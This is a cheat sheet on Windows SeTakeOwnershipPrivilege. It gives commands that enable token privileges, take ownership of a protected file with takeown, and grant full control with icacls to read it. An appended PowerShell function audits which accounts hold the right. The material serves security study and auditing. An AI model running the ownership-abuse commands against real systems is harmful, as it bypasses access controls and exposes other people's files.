
SeTakeOwnershipPrivilege

SeTakeOwnershipPrivilege is a user rights assignment in Windows that allows a user to take ownership of any object, such as files, directories, or registry keys. This privilege is typically assigned to administrators or system accounts, granting them the ability to change the ownership of objects even if they do not have explicit permissions. It is a powerful privilege often used for system maintenance or recovery tasks. Misuse of this privilege can lead to security risks, as it bypasses standard access control mechanisms.


If SeTakeOwnershipPrivilege is Disabled
  1. Get the EnableAllTokenPrivs.ps1 script.
  2. Run the following commands:
Import-Module .\Enable-Privilege.ps1 ## Import the script into the PowerShell session
.\EnableAllTokenPrivs.ps1 ## Enable all privileges held in the current token

whoami /priv ## Verify

Ownership Abuse

# Check Last Write Time, Attributes & Owner for the file 
Get-ChildItem -Path 'C:\Hidden\secret.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}

# Directory Ownership
cmd /c dir /q 'C:\Hidden'

# Take Ownership of the file
takeown /f 'C:\Hidden\secret.txt'

# Owning the file does not grant read access by itself; grant ourselves Full Control in the ACL to view it
icacls 'C:\Hidden\secret.txt' /grant rezydev:F
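
Because the right is normally limited to administrators, a quick audit is to list who actually holds it in local security policy. The following is an added example, not part of the original page: the function name `Get-TakeOwnershipHolders` and the sample SID are hypothetical, and it assumes an elevated prompt when exporting live policy with `secedit`.

```powershell
# Added example: list principals assigned SeTakeOwnershipPrivilege and flag
# any holder other than the Windows default (BUILTIN\Administrators).
function Get-TakeOwnershipHolders {
    param(
        # Lines of a "secedit /export /areas USER_RIGHTS" file.
        # If omitted, the live local policy is exported and read.
        [string[]]$PolicyLines
    )
    if (-not $PSBoundParameters.ContainsKey('PolicyLines')) {
        $tmp = Join-Path $env:TEMP ("rights-{0}.inf" -f [guid]::NewGuid())
        secedit /export /cfg $tmp /areas USER_RIGHTS | Out-Null
        $PolicyLines = Get-Content -Path $tmp
        Remove-Item -Path $tmp -Force
    }
    $line = $PolicyLines |
        Where-Object { $_ -match '^\s*SeTakeOwnershipPrivilege\s*=' } |
        Select-Object -First 1
    if (-not $line) { return }   # the right is assigned to nobody

    foreach ($entry in (($line -split '=', 2)[1] -split ',')) {
        # secedit prefixes SIDs with '*'; some accounts appear by name instead.
        $id = $entry.Trim().TrimStart('*')
        if (-not $id) { continue }
        $name = $id
        if ($id -like 'S-1-*') {
            try {
                $sid  = [System.Security.Principal.SecurityIdentifier]$id
                $name = $sid.Translate([System.Security.Principal.NTAccount]).Value
            } catch {
                $name = '<unresolved>'   # deleted account or foreign domain
            }
        }
        [pscustomobject]@{
            Identity   = $id
            Name       = $name
            Unexpected = ($id -ne 'S-1-5-32-544')   # S-1-5-32-544 = Administrators
        }
    }
}

# Constructed sample export (the second SID is a placeholder) for offline use.
$sample = @(
    '[Privilege Rights]'
    'SeTakeOwnershipPrivilege = *S-1-5-32-544,*S-1-5-21-1111111111-2222222222-3333333333-1105'
)
Get-TakeOwnershipHolders -PolicyLines $sample | Format-Table -AutoSize
```

Call `Get-TakeOwnershipHolders` with no arguments to check the live policy; any row with `Unexpected` set to `True` is an account that can take ownership of objects it has no permissions on.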